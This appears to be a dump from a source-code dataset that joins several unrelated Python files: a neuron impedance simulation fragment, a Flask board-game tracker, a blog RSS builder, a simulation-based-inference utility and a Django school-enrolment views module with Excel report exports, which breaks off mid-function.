'timeVmemNp1bb_' + IBiasStr + '_' + IZapMaxStr + '.txt'\nfile9 = open(timeVmemFileStr,'w')\nfor index in range(len(M.t)):\n file9.write(str(M.t[index] / ms) + \" \" + str(M[0].v[index] / mV) + '\\n')\nfile9.close()\n\nZfft_CoreFileStr = 'ZfftNp1bb_' + IBiasStr + '_' + IZapMaxStr\nabsZfft_CoreFileStr = 'absZfftNp1bb_' + IBiasStr + '_' + IZapMaxStr\nfile10 = open(Zfft_CoreFileStr + '.txt','w')\nfile11 = open(absZfft_CoreFileStr + '.txt','w')\nfor index in range(len(Zfft)):\n file10.write(str((index/len(Zfft)) * (1/defaultclock.dt)/Hz) + \" \" + str(Zfft[index]) + '\\n')\n file11.write(str((index/len(Zfft)) * (1/defaultclock.dt)/Hz) + \" \" + str(abs(Zfft[index])) + '\\n')\nfile10.close()\nfile11.close()\n\nfig_absZ_Np1bb, ax = plt.subplots(1, 1)\nax.set_title('model LSO nrn Np1b (22C,0.45-s pre-bias)', fontsize=16)\nax.set_ylabel('impedance (MOhm)', fontsize=16)\nax.set_xlabel('frequency (Hz)', fontsize=16)\nax.set_ylim((0,80))\nax.tick_params(axis='both', which='major', labelsize=16)\nax.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6, linewidth=2.0)\nfig_absZ_Np1bb.tight_layout()\nfig_absZ_Np1bb.savefig(absZfft_CoreFileStr + '.png', dpi=300)\n\n#fig_out, ax = plt.subplots(1, 1)\n#ax.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6, linewidth=2.0, alpha=0.3, color='gray')\n#inch = 2.54\n#fig_out.subplots_adjust(wspace=0.3, hspace=0.5)\n#fig_out.set_size_inches(12.0/inch, 4.0 * len(electrodes)/inch)\n#fig_out.tight_layout()\n#fig_out.savefig(figures_path + 'ci_el_disc_fast_time_domain.pdf', dpi=300)\n#fig_out.savefig(figures_path + 'ci_el_disc_fast_time_domain.png', dpi=300)\n\n","sub_path":"04kHz/ZmagNp1bbShortSettle.py","file_name":"ZmagNp1bbShortSettle.py","file_ext":"py","file_size_in_byte":9965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"629186466","text":"#!/usr/bin/env python3\n\"\"\"\nBoard Game Record Keeper\n\n@author: Roman\n@version: 2022.11\n\"\"\"\n\nfrom csv import DictReader\nfrom functools import cache\nfrom os import environ\n\nimport requests\nfrom dotenv import load_dotenv\nfrom flask import (\n Flask,\n jsonify,\n make_response,\n redirect,\n render_template,\n request,\n session,\n url_for,\n)\n\n\n@cache\ndef read_data_file(filename):\n all_games = {}\n with open(filename) as datafile:\n for record in DictReader(datafile):\n all_games[record[\"title\"]] = record\n return all_games\n\n\ndef create_app():\n app = Flask(__name__)\n load_dotenv()\n app.config.from_prefixed_env()\n app.config[\"all_games\"] = read_data_file(\"data/games.csv\")\n app.config[\"bga_client_id\"] = environ[\"BGA_CLIENT_ID\"]\n\n return app\n\n\napp = create_app()\n\n\n@app.get(\"/\")\ndef index():\n all_games = app.config[\"all_games\"]\n chosen_games = session.get(\"chosen_games\", [])\n if not chosen_games:\n return render_template(\"base.html\", games=all_games.values())\n return render_template(\n \"games.html\", games=all_games.values(), collection=chosen_games\n )\n\n\n@app.post(\"/addgame\")\ndef read_user_selection():\n all_games = app.config[\"all_games\"]\n response = make_response(redirect(url_for(\"index\"), code=303))\n game_title = request.form.get(\"game\")\n game_info_bga = requests.get(\n f\"https://api.boardgameatlas.com/api/search?name={game_title}&client_id={app.config['bga_client_id']}\"\n )\n game_min_age = 0\n try:\n game_min_age = game_info_bga.json()[\"games\"][0][\"min_age\"]\n except Exception:\n pass\n chosen_games = session.get(\"chosen_games\", [])\n new_game = all_games[game_title]\n new_game[\"min_age\"] = game_min_age\n chosen_games.append(new_game)\n session[\"chosen_games\"] = chosen_games\n\n return response\n\n\n@app.get(\"/api/v1/games/all\")\ndef get_all_games():\n all_games = app.config[\"all_games\"]\n return all_games\n\n\n@app.get(\"/api/v1/games/my\")\ndef get_user_games():\n chosen_games = session.get(\"chosen_games\", [])\n return jsonify(chosen_games)\n","sub_path":"examples/bgrk2/bgrk.py","file_name":"bgrk.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"327917732","text":"import json\nimport app\nfrom datetime import datetime\n\ndat = app.post_list\nfor post in dat:\n datetime_obj = post['date']\n post['month'] = datetime_obj.month\n post['day'] = datetime_obj.day\n post['year'] = datetime_obj.year\n del post['date']\n del post['template']\n post['route'] = '//residentmar.io/' + post['route']\n\nwith open('./static/json/post_list.json', 'w') as outfile:\n json.dump(dat, outfile, indent=4)\n\nxml = \"\"\"\n\n\n\nData Hacks\nhttp://www.residentmar.io/\nData hacks and other musings by Aleksey Bilogur\n\"\"\"\n\nfor post in dat:\n xml += \"\"\"\n \n {0}\n {1}\n {1}\n {2}\n \"\"\".format(post['title'], 'http:' + post['route'], datetime(post['year'], post['month'],\n post['day']).strftime('%a, %d %b %Y %H:00:00 EST'))\n xml += \"\"\"\"\"\"\n\nxml += \"\"\"\n\n\n\"\"\"\n\nwith open('./static/json/post_list.json', 'w') as outfile:\n json.dump(dat, outfile, indent=4)\n\nwith open('./templates/rss.xml', 'w') as outfile:\n outfile.write(xml)","sub_path":"munge_posts.py","file_name":"munge_posts.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"478100895","text":"import numpy as np\nimport os\nimport torch\nimport glob\nimport pickle\n\nfrom hypothesis.benchmark.tractable_small import Prior\nfrom hypothesis.benchmark.tractable_small import Simulator\nfrom hypothesis.nn.ratio_estimation import expectation_marginals_ratio\n\nfrom ratio_estimation import DatasetJointTest as Dataset\nfrom ratio_estimation import coverage\nfrom ratio_estimation import load_estimator\n\nfrom sbc import sbc_run\n\n\n@torch.no_grad()\ndef simulate(n=10000, directory=\".\"):\n simulator = Simulator()\n prior = Prior()\n inputs = prior.sample((n,)).cpu()\n outputs = simulator(inputs)\n if directory is not None:\n if not os.path.exists(directory):\n os.makedirs(directory)\n np.save(directory + \"/inputs.npy\", inputs.numpy())\n np.save(directory + \"/outputs.npy\", outputs.numpy())\n\n return inputs, outputs\n\n\nclass FlowEnsemble():\n def __init__(self, flows):\n self.flows = flows\n\n def log_prob(self, *args, **kwargs):\n posteriors = [flow.log_prob(*args, **kwargs) for flow in self.flows]\n return torch.stack(posteriors, axis=0).exp().mean(axis=0).log()\n\nclass CpuPrior():\n def __init__(self, prior):\n self.prior = prior\n\n def log_prob(self, samples):\n return self.prior.log_prob(samples).cpu()\n\n\n@torch.no_grad()\ndef coverage_of_estimator(path_to_weights, cl_list=[0.95], reduce=\"ratio_mean\", flow_sbi=False, max_samples=None):\n if flow_sbi:\n paths = glob.glob(path_to_weights)\n flows = [pickle.load(open(path, \"rb\")) for path in paths]\n for flow in flows:\n flow._prior = CpuPrior(flow._prior)\n\n if len(flows) > 1:\n r = FlowEnsemble(flows)\n else:\n r = flows[0]\n\n else:\n r = load_estimator(path_to_weights, reduce=reduce)\n\n d = Dataset()\n\n if max_samples is None:\n inputs = d[:][\"inputs\"]\n outputs = d[:][\"outputs\"]\n else:\n inputs = d[:max_samples][\"inputs\"]\n outputs = d[:max_samples][\"outputs\"]\n\n alphas = [1 - cl for cl in cl_list]\n emperical_coverage = coverage(r, inputs, outputs, alphas,flow_sbi=flow_sbi)\n\n return emperical_coverage\n\n\n@torch.no_grad()\ndef measure_diagnostic(r, n=100000):\n d = Dataset()\n\n return expectation_marginals_ratio(d, r, n=n)\n\n@torch.no_grad()\ndef importance_posterior_sampling(prior, posterior, nb_samples, nb_gen_samples):\n init_samples = prior.sample((nb_gen_samples,))\n weights = (posterior.log_prob(init_samples).squeeze() - prior.log_prob(init_samples).squeeze()).exp().numpy().squeeze()\n weights = weights/weights.sum()\n indices = np.arange(len(init_samples))\n samples_indices = np.random.choice(indices, size=nb_samples, replace=False, p=weights)\n samples = init_samples[samples_indices, :]\n\n return samples\n\n@torch.no_grad()\ndef compute_sbc(path_to_weights, nb_rank_samples, nb_posterior_samples, save_name, reduce=\"ratio_mean\", flow_sbi=False):\n prior = Prior()\n simulator = Simulator()\n\n if flow_sbi:\n paths = glob.glob(path_to_weights)\n flows = [pickle.load(open(path, \"rb\")) for path in paths]\n for flow in flows:\n flow._prior = CpuPrior(flow._prior)\n\n if len(flows) > 1:\n flow_posterior = FlowEnsemble(flows)\n else:\n flow_posterior = flows[0]\n\n class FlowPosterior():\n def __init__(self, x, flow):\n self.x = x\n self.flow = flow\n\n def log_prob(self, theta):\n tmp = self.flow.log_prob(theta, x=self.x, norm_posterior=False)[0]\n assert(tmp.shape == (len(theta),))\n return tmp\n\n\n def sample_posterior(x, nb_samples):\n posterior = FlowPosterior(x, flow_posterior)\n return importance_posterior_sampling(prior, posterior, nb_samples, nb_samples*100)\n\n else:\n r = load_estimator(path_to_weights, reduce=reduce)\n\n class RatioPosterior():\n def __init__(self, x, prior, ratio):\n self.x = x\n self.prior = prior\n self.ratio = ratio\n\n def log_prob(self, theta):\n outputs = self.x.repeat(len(theta), 1, 1, 1).float()\n return self.prior.log_prob(theta) + self.ratio.log_ratio(inputs=theta, outputs=outputs)\n\n def sample_posterior(x, nb_samples):\n posterior = RatioPosterior(x, prior, r)\n return importance_posterior_sampling(prior, posterior, nb_samples, nb_samples*100)\n\n sbc_run(prior, simulator, sample_posterior, nb_rank_samples, nb_posterior_samples, save_name)\n","sub_path":"workflows/coverage_simulations_and_bias_reduction/slcp/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"160268619","text":"# -*- encoding: utf-8 -*-\nfrom unittest import result\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.template import RequestContext\nfrom django.contrib.auth.hashers import make_password\nfrom .models import Usuario\nfrom .models import Persona\nfrom .models import docente,Alumno2,Grado,Sisben,Estrato,Municipios,Veredas,Universidades,Colegios,CentrosSena,FormularioEstimulos,Sedes,\\\nCentrosSena,Horas,Fechas,Traza,Grupos2,Grado,Inst_educativas2,SedeInstitucion2,Video\nfrom validators import Validator, FormLoginValidator\nfrom django.contrib import auth\nimport xhtml2pdf.pisa as pisa\nfrom StringIO import StringIO\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import get_object_or_404\nfrom django.http import JsonResponse\nfrom django.core import serializers\nimport json\nfrom django.db.models import Q\nfrom openpyxl import Workbook\nfrom django.contrib.auth.decorators import permission_required\n# Create your views here.\ndef login(request):\n \"\"\"view del login\n \"\"\"\n #Verificamos que los datos lleguen por el methodo POST\n\n if request.method == 'POST':\n #Cargamos el formulario (ver forms.py con los datos del POST)\n validator = FormLoginValidator(request.POST)\n #formulario = LoginForm(data = request.POST)\n #Verificamos que los datos esten correctos segun su estructura\n\n if validator.is_valid():\n # Capturamos las variables que llegan por POST\n\n auth.login(request, validator.acceso) # Crear una sesion\n return HttpResponseRedirect(request.POST['next'])\n else:\n return render_to_response('login.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n next = '/portada'\n if 'next' in request.GET:\n next = request.GET['next']\n\n return render_to_response('login.html', {'next': next} ,context_instance = RequestContext(request))\n\n@permission_required('Usuario.can_add_Usuario', login_url = '/login')\ndef registro(request):\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','user','password']\n if validators.is_valid():\n usuario = Usuario()\n usuario.first_name = request.POST['nombre']\n usuario.last_name = request.POST['apellido']\n usuario.username = request.POST['user']\n usuario.email = request.POST['email']\n usuario.password = make_password(request.POST['password'])\n usuario.is_active = True\n usuario.save()\n return render_to_response('portada.html',context_instance = RequestContext(request))\n else:\n return render_to_response('registrarse.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef persona(request):\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','email','sexo']\n if validators.is_valid():\n alumno = Alumno()\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n alumno.documento = request.POST['documento']\n alumno.email = request.POST['email']\n alumno.sexo = request.POST['sexo']\n alumno.save()\n print(alumno.nombres)\n else:\n return render_to_response('registrarse.html', {'error': validator.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef inicio(request):\n return render_to_response('inicio.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraMatricula(request):\n return render_to_response('configuraMatriculas.html',context_instance = RequestContext(request))\n\ndef passwordResetForm(request):\n return render_to_response('passwordResetForm.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraInstitucion(request):\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n institucion = Inst_educativas2()\n institucion.nombre = request.POST['institucion']\n institucion.save()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarInstitucion(request, pk):\n institucion = get_object_or_404(Inst_educativas2, pk=pk)\n if request.method == 'POST':\n Inst_educativa = get_object_or_404(Inst_educativas2, pk=pk)\n Inst_educativa.nombre = request.POST['institucion']\n Inst_educativa.direccion = request.POST['direccion']\n Inst_educativa.save()\n instituciones = Inst_educativas2.objects.all()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('editarInstitucion.html',{'institucion':institucion}, context_instance = RequestContext(request))\n\n@permission_required('Inst_educativas2.can_delete_Inst_educativas2', login_url = '/login')\ndef eliminarInstitucion(request, pk):\n institucion = get_object_or_404(Inst_educativas2, pk=pk)\n if request.method == 'POST':\n institucion.delete()\n instituciones = Inst_educativas2.objects.all()\n return render_to_response('configuraInstitucion.html',{'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('eliminarInstitucion.html',{'institucion':institucion}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraGrado(request):\n grados = Grado.objects.all()\n if request.method == 'POST':\n grado = Grado()\n grado.grado = request.POST['grado']\n grado.save()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarGrado(request, pk):\n grado = get_object_or_404(Grado, pk=pk)\n if request.method == 'POST':\n grado = get_object_or_404(Grado, pk=pk)\n grado.grado = request.POST['grado']\n grado.save()\n grados = Grado.objects.all()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('editarGrado.html',{'grado':grado}, context_instance = RequestContext(request))\n\n@permission_required('Grado.can_delete_Grado', login_url = '/login')\ndef eliminarGrado(request, pk):\n grado = get_object_or_404(Grado, pk=pk)\n if request.method == 'POST':\n grado.delete()\n grados = Grado.objects.all()\n return render_to_response('configuraGrado.html',{'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('eliminarGrado.html',{'grado':grado}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraSede(request):\n sedes = SedeInstitucion2.objects.all()\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n sede = SedeInstitucion2()\n sede.sede = request.POST['sede']\n sede.institucion_id = request.POST['institucion']\n sede.save()\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarSede(request, pk):\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n instituciones = Inst_educativas2.objects.all()\n if request.method == 'POST':\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n sede.sede = request.POST['sede']\n sede.institucion_id = request.POST['institucion']\n sede.save()\n sedes = SedeInstitucion2.objects.all()\n return render_to_response('configuraSede.html',{'sedes':sedes, 'instituciones':instituciones}, context_instance = RequestContext(request))\n return render_to_response('editarSede.html',{'sede':sede, 'instituciones':instituciones}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\n@permission_required('SedeInstitucion2.can_delete_SedeInstitucion2', login_url = '/login')\ndef eliminarSede(request, pk):\n sede = get_object_or_404(SedeInstitucion2, pk=pk)\n if request.method == 'POST':\n sede.delete()\n sedes = SedeInstitucion2.objects.all()\n return render_to_response('configuraSede.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('eliminarSede.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuraGrupo(request):\n grupos = Grupos2.objects.all()\n grados = Grado.objects.all()\n if request.method == 'POST':\n grupo = Grupos2()\n grupo.grupo = request.POST['grupo']\n grupo.grado_id = request.POST['grado']\n grupo.save()\n return render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarGrupo(request, pk):\n grupo = get_object_or_404(Grupos2, pk=pk)\n grados = Grado.objects.all()\n if request.method == 'POST':\n grupo = get_object_or_404(Grupos2, pk=pk)\n grupo.grupo = request.POST['grupo']\n grupo.grado_id = request.POST['grado']\n grupo.save()\n grupos = Grupos2.objects.all()\n return render_to_response('configuraGrupo.html',{'grupos':grupos, 'grados':grados}, context_instance = RequestContext(request))\n return render_to_response('editarGrupo.html',{'grupo':grupo, 'grados':grados}, context_instance = RequestContext(request))\n\n@permission_required('Grupos2.can_delete_Grupos2', login_url = '/login')\ndef eliminarGrupo(request, pk):\n grupo = get_object_or_404(Grupos2, pk=pk)\n if request.method == 'POST':\n grupo.delete()\n grupos = Grupos2.objects.all()\n return render_to_response('configuraGrupo.html',{'grupos':grupos}, context_instance = RequestContext(request))\n return render_to_response('eliminarGrupo.html',{'grupo':grupo}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas2(request):\n return render_to_response('formulario_exitoso.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef Estatico(request):\n return render_to_response('estatico.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef InformeVarios(request):\n return render_to_response('reportesVarios.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef informeVca(request):\n fechas = Fechas.objects.order_by('fecha','hora')\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n\n #Creamos los encabezados desde la celda B3 hasta la E3\n\n ws['b1'] = 'HORA'\n ws['c1'] = 'FECHA'\n ws['d1'] = 'NOMBRE'\n ws['e1'] = 'APELLIDO'\n ws['f1'] = 'DOCUMENTO'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for fecha in fechas:\n ws.cell(row=cont,column=2).value = fecha.hora.hora\n ws.cell(row=cont,column=3).value = fecha.fecha\n ws.cell(row=cont,column=4).value = fecha.nombre.nombre\n ws.cell(row=cont,column=5).value = fecha.nombre.apellido\n ws.cell(row=cont,column=6).value = fecha.nombre.documento\n cont = cont + 1\n\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendaEntrevistaExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef excelAgendados(request):\n fechas = Fechas.objects.order_by('fecha','hora')\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n #Creamos los encabezados desde la celda B3 hasta la E3\n ws['b1'] = 'nombre'\n ws['c1'] = 'apellido'\n ws['d1'] = 'tipoDocumento'\n ws['e1'] = 'documento'\n ws['f1'] = 'documentoOtro'\n ws['g1'] = 'email'\n ws['h1'] = 'celular'\n ws['i1'] = 'genero'\n ws['j1'] = 'edad'\n ws['k1'] = 'estadoCivil'\n ws['l1'] = 'cabezaFamilia'\n ws['m1'] = 'hijos'\n ws['n1'] = 'pertenencia'\n ws['o1'] = 'pertenenciaOtro'\n ws['p1'] = 'direccionEstudiante'\n ws['q1'] = 'ciudadEstudiante'\n ws['r1'] = 'barrioEstudiante'\n ws['s1'] = 'ubicacionEstudiante'\n ws['t1'] = 'vivienda'\n ws['u1'] = 'estrato'\n ws['v1'] = 'sisben'\n ws['w1'] = 'nucleoFamiliar'\n ws['x1'] = 'direccionPadres'\n ws['y1'] = 'ciudadPadres'\n ws['z1'] = 'barrioPadres'\n ws['aa1'] = 'ubicacionPadres'\n ws['ab1'] = 'serviciosPublicos'\n ws['ac1'] = 'dependenciaEconomica'\n ws['ad1'] = 'dependenciaOtro'\n ws['ae1'] = 'ingresosFamilia'\n ws['af1'] = 'colegio'\n ws['ag1'] = 'oficialPrivado'\n ws['ah1'] = 'añoTerminacion'\n ws['ai1'] = 'actaGrado'\n ws['aj1'] = 'universidad'\n ws['ak1'] = 'centrosSena'\n ws['al1'] = 'sede'\n ws['am1'] = 'acreditacionUniversidad'\n ws['an1'] = 'carrera'\n ws['ao1'] = 'tecnicaTecnologica'\n ws['ap1'] = 'acreditacionCarrera'\n ws['aq1'] = 'cicloEducacion'\n ws['ar1'] = 'semestreEnCurso'\n ws['as1'] = 'modalidad'\n ws['at1'] = 'modalidadOtro'\n ws['au1'] = 'propedeutico'\n ws['av1'] = 'propedeuticoOtro'\n ws['aw1'] = 'valorMatricula'\n ws['ax1'] = 'beneficiarioprogramas'\n ws['ay1'] = 'programaOtro'\n ws['az1'] = 'incentivoEducativo'\n ws['ba1'] = 'cuantasVeces'\n ws['bb1'] = 'extraAcademicas'\n ws['bc1'] = 'extraAcademicaPaga'\n ws['bd1'] = 'parentesco1'\n ws['be1'] = 'parentesco2'\n ws['bf1'] = 'parentesco3'\n ws['bg1'] = 'parentesco4'\n ws['bh1'] = 'parentesco5'\n ws['bi1'] = 'parentesco6'\n ws['bj1'] = 'parentesco7'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for fecha in fechas:\n ws.cell(row=cont,column=2).value = fecha.nombre.nombre\n ws.cell(row=cont,column=3).value = fecha.nombre.apellido\n ws.cell(row=cont,column=4).value = fecha.nombre.tipoDocumento\n ws.cell(row=cont,column=5).value = fecha.nombre.documento\n ws.cell(row=cont,column=6).value = fecha.nombre.documentoOtro\n ws.cell(row=cont,column=7).value = fecha.nombre.email\n ws.cell(row=cont,column=8).value = fecha.nombre.celular\n ws.cell(row=cont,column=9).value = fecha.nombre.genero\n ws.cell(row=cont,column=10).value = fecha.nombre.edad\n ws.cell(row=cont,column=11).value = fecha.nombre.estadoCivil\n ws.cell(row=cont,column=12).value = fecha.nombre.cabezaFamilia\n ws.cell(row=cont,column=13).value = fecha.nombre.hijos\n ws.cell(row=cont,column=14).value = fecha.nombre.pertenencia\n ws.cell(row=cont,column=15).value = fecha.nombre.pertenenciaOtro\n ws.cell(row=cont,column=16).value = fecha.nombre.direccionEstudiante\n ws.cell(row=cont,column=17).value = fecha.nombre.ciudadEstudiante\n ws.cell(row=cont,column=18).value = fecha.nombre.barrioEstudiante\n ws.cell(row=cont,column=19).value = fecha.nombre.ubicacionEstudiante\n ws.cell(row=cont,column=20).value = fecha.nombre.vivienda\n ws.cell(row=cont,column=21).value = fecha.nombre.estrato\n ws.cell(row=cont,column=22).value = fecha.nombre.sisben\n ws.cell(row=cont,column=23).value = fecha.nombre.nucleoFamiliar\n ws.cell(row=cont,column=24).value = fecha.nombre.direccionPadres\n ws.cell(row=cont,column=25).value = fecha.nombre.ciudadPadres\n ws.cell(row=cont,column=26).value = fecha.nombre.barrioPadres\n ws.cell(row=cont,column=27).value = fecha.nombre.ubicacionPadres\n ws.cell(row=cont,column=28).value = fecha.nombre.serviciosPublicos\n ws.cell(row=cont,column=29).value = fecha.nombre.dependenciaEconomica\n ws.cell(row=cont,column=30).value = fecha.nombre.dependenciaOtro\n ws.cell(row=cont,column=31).value = fecha.nombre.ingresosFamilia\n ws.cell(row=cont,column=32).value = fecha.nombre.colegio\n ws.cell(row=cont,column=33).value = fecha.nombre.oficialPrivado\n ws.cell(row=cont,column=34).value = fecha.nombre.anoTerminacion\n ws.cell(row=cont,column=35).value = fecha.nombre.actaGrado\n ws.cell(row=cont,column=36).value = fecha.nombre.universidad\n ws.cell(row=cont,column=37).value = fecha.nombre.centrosSena\n ws.cell(row=cont,column=38).value = fecha.nombre.sede\n ws.cell(row=cont,column=39).value = fecha.nombre.acreditacionUniversidad\n ws.cell(row=cont,column=40).value = fecha.nombre.carrera\n ws.cell(row=cont,column=41).value = fecha.nombre.tecnicaTecnologica\n ws.cell(row=cont,column=42).value = fecha.nombre.acreditacionCarrera\n ws.cell(row=cont,column=43).value = fecha.nombre.cicloEducacion\n ws.cell(row=cont,column=44).value = fecha.nombre.semestreEnCurso\n ws.cell(row=cont,column=45).value = fecha.nombre.modalidad\n ws.cell(row=cont,column=46).value = fecha.nombre.modalidadOtro\n ws.cell(row=cont,column=47).value = fecha.nombre.propedeutico\n ws.cell(row=cont,column=48).value = fecha.nombre.propedeuticoOtro\n ws.cell(row=cont,column=49).value = fecha.nombre.valorMatricula\n ws.cell(row=cont,column=50).value = fecha.nombre.beneficiarioprogramas\n ws.cell(row=cont,column=51).value = fecha.nombre.programaOtro\n ws.cell(row=cont,column=52).value = fecha.nombre.incentivoEducativo\n ws.cell(row=cont,column=53).value = fecha.nombre.cuantasVeces\n ws.cell(row=cont,column=54).value = fecha.nombre.extraAcademicas\n ws.cell(row=cont,column=55).value = fecha.nombre.extraAcademicaPaga\n ws.cell(row=cont,column=56).value = fecha.nombre.parentesco1\n ws.cell(row=cont,column=57).value = fecha.nombre.parentesco2\n ws.cell(row=cont,column=58).value = fecha.nombre.parentesco3\n ws.cell(row=cont,column=59).value = fecha.nombre.parentesco4\n ws.cell(row=cont,column=60).value = fecha.nombre.parentesco5\n ws.cell(row=cont,column=61).value = fecha.nombre.parentesco6\n ws.cell(row=cont,column=62).value = fecha.nombre.parentesco7\n cont = cont + 1\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendadosExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef informeAlumnos(request):\n alumnos = Alumno2.objects.all()\n wb = Workbook()\n #Definimos como nuestra hoja de trabajo, la hoja activa, por defecto la primera del libro\n ws = wb.active\n #En la celda B1 ponemos el texto 'REPORTE DE PERSONAS'\n\n #Juntamos las celdas desde la B1 hasta la E1, formando una sola celda\n\n #Creamos los encabezados desde la celda B3 hasta la E3\n\n ws['b1'] = 'PROCEDENCIA'\n ws['c1'] = 'INSTITUCION'\n ws['d1'] = 'SEDE'\n ws['e1'] = 'NOMBRES'\n ws['f1'] = 'APELLIDOS'\n ws['g1'] = 'DOCUMENTO'\n ws['h1'] = 'GRADO'\n ws['i1'] = 'GENERO'\n ws['j1'] = 'TRANSPORTE'\n cont=4\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n for alumno in alumnos:\n ws.cell(row=cont,column=2).value = alumno.procedencia.vereda\n ws.cell(row=cont,column=3).value = alumno.institucion.nombre\n ws.cell(row=cont,column=4).value = alumno.sede.sede\n ws.cell(row=cont,column=5).value = alumno.nombres\n ws.cell(row=cont,column=6).value = alumno.apellidos\n ws.cell(row=cont,column=7).value = alumno.documento\n ws.cell(row=cont,column=8).value = alumno.grado.grado\n ws.cell(row=cont,column=9).value = alumno.genero\n ws.cell(row=cont,column=10).value = alumno.transporte\n cont = cont + 1\n\n #Recorremos el conjunto de personas y vamos escribiendo cada uno de los datos en las celdas\n\n #Establecemos el nombre del archivo\n nombre_archivo =\"ReporteAgendaEntrevistaExcel.xlsx\"\n #Definimos que el tipo de respuesta a devolver es un archivo de microsoft excel\n response = HttpResponse(content_type=\"application/ms-excel\")\n contenido = \"attachment; filename={0}\".format(nombre_archivo)\n response[\"Content-Disposition\"] = contenido\n wb.save(response)\n return response\n\n@login_required(login_url = \"/login\")\ndef informe(request):\n return render_to_response('informe.html',context_instance = RequestContext(request))\n\ndef validaDocumento(request):\n sisben = Sisben.objects.all()\n estrato = Estrato.objects.all()\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n 